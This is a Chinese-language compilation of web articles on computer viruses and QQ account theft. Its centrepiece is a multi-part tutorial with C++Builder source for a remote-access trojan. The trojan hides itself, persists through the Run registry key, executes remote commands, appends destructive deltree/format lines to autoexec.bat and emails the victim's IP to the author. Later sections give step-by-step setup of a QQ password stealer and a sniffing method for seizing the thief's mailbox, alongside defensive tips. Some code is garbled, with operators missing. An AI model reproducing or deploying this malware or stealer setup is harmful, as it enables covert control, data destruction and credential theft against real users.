什么是黑客?什么是电脑病毒?是怎么作的?
什么是计算机病毒
计算机病毒是一个程序,一段可执行码。就像生物病毒一样,计算机病毒有独特的复制能力。计算机病毒可以很快地蔓
延,又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就随
同文件一起蔓延开来。
除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎
仅仅表现在文字和图象上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不
寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。
可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序
的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为
制造的程序,它通过不同的途径潜伏或寄生在存储媒体(如磁盘、内存)或程序里。当某种条件或时机成熟时,它会自生复制
并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒
所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复
制, 具有传染性。
所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质(或程序)里, 当达到某种条件时即被激活的具有对计
算机资源进行破坏作用的一组程序或指令集合。
参考:http://www.eduboss.com/pages/winfile/FaQ/bingdu.html
木马是如何编写的(一)
武汉 周侃
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!呵呵,要知道,木马(Trojan)的历史是很悠久的:早在ATT Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成??服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗?
启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。
首先判断目标机的操作系统是Win9x还是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系统的版本号
if (dwVersion = 0x80000000)
// 操作系统是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定义RegisterServiceProcess()函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://执行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL);
file://卸载动态链接库
}
}
这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:
{
char TempPath[MAX_PATH];
file://定义一个变量
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径
SystemPath=AnsiString(TempPath);
file://格式化TempPath字符串,使之成为能供编译器使用的样式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来
Registry=new TRegistry;
file://定义一个TRegistry对象,准备修改注册表,这一步必不可少
Registry-RootKey=HKEY_LOCAL_MACHINE;
file://设置主键为HKEY_LOCAL_MACHINE
Registry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之
try
{
file://如果以下语句发生异常,跳至catch,以避免程序崩溃
if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");
file://查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe
file://如果不是,就写入以上键值和内容
}
catch(...)
{
file://如果有错误,什么也不做
}
}
好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。
接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。
再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定义了一堆待会儿要用到的变量
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
file://在%System%下建立一个文本文件Win369.bat,作为临时文件使用
AnsiString temp=Socket-ReceiveText();
file://接收客户端(攻击者,也就是你自己)传来的数据
}
好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:
{
if(temp.SubString(0,9)=="edit conf")
file://如果接受到的字符串的前9个字符是“edit conf”
{
int number=temp.Length();
file://得到字符串的长度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://将第11个字符转换成integer型,存入file_name变量
file://为什么要取第11个字符,因为第10个字符是空格字符
content=(temp.SubString(12,number-11)+'\n').c_str();
file://余下的字符串将被作为写入的内容写入目标文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\autoexec.bat",S_IREADS_IWRITE);
chmod("c:\\config.sys",S_IREADS_IWRITE);
file://将两个目标文件的属性改为可读可写
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat");
file://如果第11个字符是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys");
file://如果第11个字符是1,就把Config.sys格式化
times_of_try=0;
file://定义计数器
while(fp==NULL)
{
file://如果指针是空
fp=fopen(filename,"a+");
file://如果文件不存在,创建之;如果存在,准备在其后添加
file://如果出错,文件指针为空,这样就会重复
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已经试了100次了,仍未成功
Socket-SendText("Fail By Open File");
file://就发回“Fail By Open File”的错误信息
goto END;
file://跳至END处
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!
fclose(fp);
file://写完后关闭目标文件
Socket-SendText("Sucess");
file://然后发回“Success”的成功信息
}
}
上回我们讲到如何修改目标机上的启动配置文件,这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲?:
{
else if(temp.SubString(0,3)=="dir")
{
file://如果前3个字符是“dir”
int Read_Num;
char * CR_LF="\n";
int attrib;
char *filename;
DIR *dir;
struct dirent *ent;
int number=temp.Length();
file://得到字符串的长度
AnsiString Dir_Name=temp.SubString(5,number-3);
file://从字符串第六个字符开始,将后面的字符存入Dir_Name变量,这是目录名
if(Dir_Name=="")
{
file://如果目录名为空
Socket-SendText("Fail By Open DIR's Name");
file://返回“Fail By Open DIR's Name”信息
goto END;
file://跳到END
}
char * dirname;
dirname=Dir_Name.c_str();
if ((dir = opendir(dirname)) == NULL)
{
file://如果打开目录出错
Socket-SendText("Fail by your DIR's name!");
file://返回“Fail By Your DIR's Name”信息
goto END;
file://跳到END
}
times_of_try=0;
while(fp==NULL)
{
file://如果指针是NULL
fp=fopen(TempFile,"w+");
file://就创建system\Win369.bat准备读和写;如果此文件已存在,则会被覆盖
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已经试了100次了,仍未成功(真有耐心!)
Socket-SendText("Fail By Open File");
file://就发回“Fail By Open File”的错误信息
goto END;
file://并跳到END处
}
}
while ((ent = readdir(dir)) != NULL)
{
file://如果访问目标目录成功
if(*(AnsiString(dirname)).AnsiLastChar()!='\\')
file://如果最后一个字符不是“\”,证明不是根目录
filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();
file://加上“\”字符后将指针指向目录流
else
filename=(AnsiString(dirname)+ent-d_name).c_str();
file://如果是根目录,则不用加“\”
attrib=_rtl_chmod(filename, 0);
file://得到目标文件的访问属性
if (attrib FA_RDONLY)
file://“”字符是比较前后两个变量,如果相同返回1,否则返回0
fwrite(" R",sizeof(char),3,fp);
file://将目标文件属性设为只读
else
fwrite(" ",sizeof(char),3,fp);
file://失败则写入空格
if (attrib FA_HIDDEN)
fwrite("H",sizeof(char),1,fp);
file://将目标文件属性设为隐藏
else
fwrite(" ",sizeof(char),1,fp);
file://失败则写入空格
if (attrib FA_SYSTEM)
fwrite("S",sizeof(char),1,fp);
file://将目标文件属性设为系统
else
fwrite(" ",sizeof(char),1,fp);
file://失败则写入空格
if (attrib FA_ARCH)
fwrite("A",sizeof(char),1,fp);
file://将目标文件属性设为普通
else
fwrite(" ",sizeof(char),1,fp);
file://失败则写入空格
if (attrib FA_DIREC)
fwrite(" DIR ",sizeof(char),9,fp);
file://将目标文件属性设为目录
else
fwrite(" ",sizeof(char),9,fp);
file://失败则写入空格
fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);
file://将目录名写入目标文件
fwrite(CR_LF,1,1,fp);
file://写入换行
}
fclose(fp);
file://关闭文件
closedir(dir);
file://关闭目录
FILE *fp1=NULL;
times_of_try=0;
while(fp1==NULL)
{
fp1=fopen(TempFile,"r");
file://打开Win369.bat准备读
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已经试了100次了,仍未成功
Socket-SendText("Fail By Open File");
file://就发回“Fail By Open File”的错误信息
goto END;
file://并跳到END处
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i300;i++) temp_content[i]='\0';
file://定义的一个空数组
Read_Num=fread(temp_content,1,300,fp1);
file://从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text变量加上刚才的300个字符
for(int i=0;i300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp1);
file://重复
};
Return_Text=Return_Text+temp_content;
file://Return_Text变量加上刚才的300个字符
fclose(fp1);
file://关闭目标文件
Socket-SendText(Return_Text);
file://返回Return_Text变量的内容
}
}
够长吧?!察看目录树这么费劲啊?!你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了,Client将使用“type”命令,(手指累不累啊?):
{
else if(temp.SubString(0,4)=="type")
{
file://如果前4个字符是“type”
int Read_Num;
int number=temp.Length();
AnsiString File_Name=temp.SubString(6,number-4);
file://将目标文件流存入File_Name变量中
times_of_try=0;
while(fp==NULL)
{
fp=fopen(File_Name.c_str(),"r");
file://打开目标文件准备读
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已试了100次了
Socket-SendText("Fail By Open File");
file://返回“Fail By Open File”的错误信息
goto END;
file://跳到END
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i300;i++) temp_content[i]='\0';
file://定义一个空数组
Read_Num=fread(temp_content,1,300,fp);
file://从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text的内容加上刚才的字符
for(int i=0;i300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp);
file://重复
};
Return_Text=Return_Text+temp_content;
file://Return_Text的内容加上刚才的字符
fclose(fp);
file://关闭目标文件
Socket-SendText(Return_Text);
file://返回Return_Text的内容,即你查看文件的内容
}
}
咳咳!累死了!还是来点轻松的吧??操纵目标机的光驱(注意:mciSendString()函数的声明在mmsystem.h头文件中):
{
else if(temp=="open")
{
file://如果收到的temp的内容是“open”
mciSendString("set cdaudio door open", NULL, 0, NULL);
file://就弹出光驱的托盘
}
else if(temp=="close")
{
file://如果收到的temp的内容是“close”
mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
file://就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^
}
}
接着就是交换目标机的鼠标左右键,代码如下:
{
else if(temp=="swap")
{
SwapMouseButton(1);
file://交换鼠标左右键,简单吧?
}
}
然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:
{
else if(temp=="reboot")
{
file://如果收到的temp的内容是“temp”
DWORD dwVersion = GetVersion();
file://得到操作系统的版本号
if (dwVersion 0x80000000)
{
file://操作系统是WinNt,不是Win9x
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
file://定义变量
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);
file://OpenProcessToken()这个函数的作用是打开一个进程的访问令牌
file://GetCurrentProcess()函数的作用是得到本进程的句柄
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);
file://LookupPrivilegeValue()的作用是修改进程的权限
tkp.PrivilegeCount = 1;
file://赋给本进程特权
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
file://AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利
ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);
file://强行退出WinNt并重启
}
else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
file://强行退出Win9x并重启
}
}
如果以上都不是,就让它在Dos窗口中执行传来的命令:
{
else
{
file://如果都不是
char * CR_TF="\n";
times_of_try=0;
while(fp==NULL)
{
fp=fopen(TempFile,"w+");
file://创建Win369.bat,如果已存在就覆盖
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
Socket-SendText("Fail By Open File");
file://返回“Fail By Open File”的信息
goto END;
file://跳到END
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
file://写入欲执行的命令
fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);
file://写入换行符
fclose(fp);
file://关闭Win369.bat
system(TempFile);
file://执行Win369.bat
Socket-SendText("Success");
file://返回“Success”信息
}
}
你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如Deltree和Format命令。^_^
到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!(未完待续)
木马是如何编写的(三)
武汉 周侃
上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下(照敲不误 ^_^):
{
END:;
Socket-Close();
file://关闭服务
ServerSocket1-Active =true;
file://再次打开服务
if (NMSMTP1-Connected) NMSMTP1-Disconnect();
file://如果SMTP服务器已连接则断开
NMSMTP1-Host = "smtp.163.net";
file://选一个好用的SMTP服务器,如163、263、sina和btamail
NMSMTP1-UserID = "";
file://你SMTP的ID
try
{
NMSMTP1-Connect();
file://再次连接
}
catch(...)
{
goto NextTime;
file://跳到NextTime
}
NMSMTP1-PostMessage-FromAddress ="I don't know!";
file://受害者的Email地址
NMSMTP1-PostMessage-FromName = "Casualty";
file://受害者的名字
NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848.net";
file://将信发到我的邮箱,这一步很关键
NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;
file://信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的IP地址,以便连接
NMSMTP1-PostMessage-Subject = "Server Runn
QQ号经常被盗是什么原因啊
通常,QQ被盗可以分为2类型。
1)个人因素导致号码丢失.
一般分:
忘记密码
修改密码中出错
把密码告诉他人被他人修改3种情况。
这属于个人因素,如果不是很粗心大意和喜欢把密码随便告诉别人,一般都不会出现这类问题.
另外,如果号码不是自己的,而是别人赠送你的,且对方设置过密码保护,那对方可以通过取回密码修改你的QQ密码。
2)其他因素导致号码丢失.
简单点说,就是号码被别人盗取密码。这是大部分网友丢失QQ号码的根本的原因。
一般是由于QQ密码过于简单和电脑中病毒引起的.
但是大家或许不清楚,怎么他会知道我的密码呢?
通常,黑客盗取QQ号码,只有2种方法,即
暴力破解法
和
木马盗取法。
暴力破解法的工作原则就是无穷尝试法,尝试任何种组合去登陆QQ号码,直到登陆成功。
木马盗取法,工作的原则是通过一个特定软件,预先安装在PC上,记录该机所有登陆QQ的号码及其密码,然后发送回黑客自己预设的邮箱。此法在网吧较常见,多是一些黑心的网管所设,也有部分是通过QQ文件传递,所以谨慎接受文件。
一、养成良好的QQ登陆习惯:
1、将密码设置为,数字+字母+符号组合,不要用单一的数字或字母组合.
2、设置保护密码.申请网址:http://service.tencent.com/reg/register.shtml。
3、如果在网吧上网,输入密码时,注意旁边是否有人,一定记得用网吧模式登陆,退出时删除所有聊天记录.
4、不要怕麻烦,每次登陆前最好进行一次木马扫瞄!经常升级更新你的杀毒软件,经常更新QQ的版本。
5、如果有条件,开通QQ会员也是个不错的好办法.
6、要提高警惕,如果网络正常情况下,发现QQ频繁掉线,可能就是你的号被盗了,有人在其他地方登陆你的QQ。
7、登陆时,发现提示上次登陆IP地址有误,要及时修改你的密码。
8、一定记得把个人设定里修改身份验证默认值设置为“需要身份认证才能把我加为好友”,将系统参数设置为“拒绝陌生人消息”。
9、千万不要轻易打开陌生人发给你的可疑文件。特别是EXT文件。它们很可能是木马程序或者被捆绑了木马程序的文件,如果电脑不小心中了木马,再长再复杂的密码都是无用的。
10、注意不要轻易暴露自己在腾讯注册E-mail,并注意E-mail密码设定的长度和复杂度。E-mail密码最好不要与QQ密码一样。
二、我们来简单了解一下密码是如何被盗的:
1.在网吧等公共场合使用QQ后,没有及时清除QQ密码和本地消息记录文件,攻击者会轻易地盗走密码。
2.攻击你在腾讯注册的邮箱。由于腾讯有一个忘记密码功能,它将用户的QQ密码发送到用户注册时留下的邮箱里,攻击者一旦破获这个邮箱,即可以很简单的拿到QQ密码。
3.利用远程破解软件暴力获取QQ密码(其实是很笨的方法)。
4.通过植入木马程序盗取QQ密码。
三、对策:
1、在网吧等公共场合使用QQ后,离开时一定要记得把QQ密码和本地消息记录文件清除掉。最好再更改一次密码,以防有程序记录你的密码。
2.运行QQ注册向导之前,将它的系统文件夹复制并且改名存放,离开网吧的时候将系统文件夹删除,然后把改名存放的原系统文件夹改回来。
3.必须到腾讯主页去申请密码保护功能,申请网址:tp://service.tencent.com/reg/register.shtml。这样即使别人盗用了你的密码,你也可以通过密码保护拿回你的密码。
4.不要轻易打开那些陌生可疑的文件,特别是EXE文件。它们很可能是木马程序或者被捆绑了木马程序的文件,如果电脑不小心中了木马,再长再复杂的密码都是无用的。
四、最快捷的方法检测电脑是否存在QQ盗号木马.
首先讲一下QQ键盘加密技术的原理:用户登陆的时候,通过加载QQ目录下的npkcrypt.sys驱动实现保护的.
QQ木马要实现QQ密码的截取,首先要破坏掉这个文件.目前还没有发现任何一款盗Q木马不是这样做的.当crypt.sys被破坏的情况下,QQ登陆窗口依然能启动,但在输入的密码框里就会出现一把坏的锁,木马则会利用各种方法进行修补.
知道了盗Q木马的原理,而且发现当npkcrypt.sys被破坏的时候,QQ密码框可以用Ctrl+V粘贴密码.得出一个通用的方法,在登陆QQ的时候,不要看键盘锁是否被破坏。而是随意复制一句字符串,然后在密码框按下Ctrl+V,如果不能贴粘,则没有盗Q木马,反之就要注意了.特别是在网吧或一些不清楚是否安全的机子下,这个方法是最快捷的。
还有一个误区要注意的,网上流传一种说法是:在输入密码时颠倒密码次序,比如:密码为123456,先输入56,然后用鼠标点击最前面的位置输入1234。这种说话已很深入人心了,但却不了解,很久已前的盗Q木马已经克服了这个问题。
QQ被盗了怎么办?
教你夺回被人盗走的QQ号码
http://blog.sina.com.cn/u/4c611bf3010008lh
很多朋友都有过QQ号被盗的经历,即使用“密码保护”功能找回来后,里面的Q币也已经被盗号者洗劫一空,碰到更恶毒的盗号者,还会将你的好友统统删除,朋友们将会永远得离开你。想过反击吗?什么,反击?别开玩笑了,我们只是菜鸟,不是黑客,我们只会看看网页,聊聊天,连QQ号是怎么被盗的都不知道,还能把盗号者怎么样呢?其实喜欢盗号的所谓“黑客”们,也只是利用了一些现成的盗号工具,只要我们了解了QQ号被盗的过程,就能作出相应防范,甚至由守转攻,给盗号者以致命一击。
一、知己知彼,盗号技术不再神秘
如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。
1、选择盗号模式
下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、爱永恒,爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,爱永恒,爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。
“邮箱收信”配置:运行alaqq.exe,出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以邮箱n12345@163.com(密码n_12345)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。
设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态。如果测试的项目都显示成功,即可完成邮箱信息配置。
“网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。
用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。
2、设置木马附加参数
接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。
3、盗取QQ号码信息
配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件捆绑后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。
二、练就慧眼,让木马在系统中无处可逃
现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。
·QQ自动关闭。
·运行某一程序后其自身消失不见。
·运行某一程序后杀毒软件自动关闭。
·访问杀毒软件网站时浏览器被自动关闭。
·如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。
·安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告。
出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。
1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINE\Software \Microsoft \Windows \Currentversion \Run。
2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。
三、以退为进,给盗号者以致命一击
忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?
1、利用漏洞,由守转攻
这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。
那么这个漏洞是什么呢?
从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米。
提示:以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马,如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。
2、网络嗅探,反夺盗号者邮箱
当木马截取到QQ号码和密码后,会将这些信息以电子邮件的形式发送到盗号者的邮箱,我们可以从这里入手,在木马发送邮件的过程中将网络数据包截取下来,这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件,这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。
·x-sniff
x-sniff是一款命令行下的嗅探工具,嗅探能力十分强大,尤其适合嗅探数据包中的密码信息。
将下载下来的x-sniff解压到某个目录中,例如“c:\”,然后运行“命令提示符”,在“命令提示符”中进入x-sniff所在的目录,然后输入命令“xsiff.exe
-pass -hide -log
pass.log”即可(命令含义:在后台运行x-sniff,从数据包中过滤出密码信息,并将嗅探到的密码信息保存到同目录下的pass.log文件中)。
嗅探软件设置完毕,我们就可以正常登录QQ。此时,木马也开始运行起来,但由于我们已经运行x-sniff,木马发出的信息都将被截取。稍等片刻后,进入x-sniff所在的文件夹,打开pass.log,便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。
·sinffer
可能很多朋友对命令行下的东西都有一种恐惧感,所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。
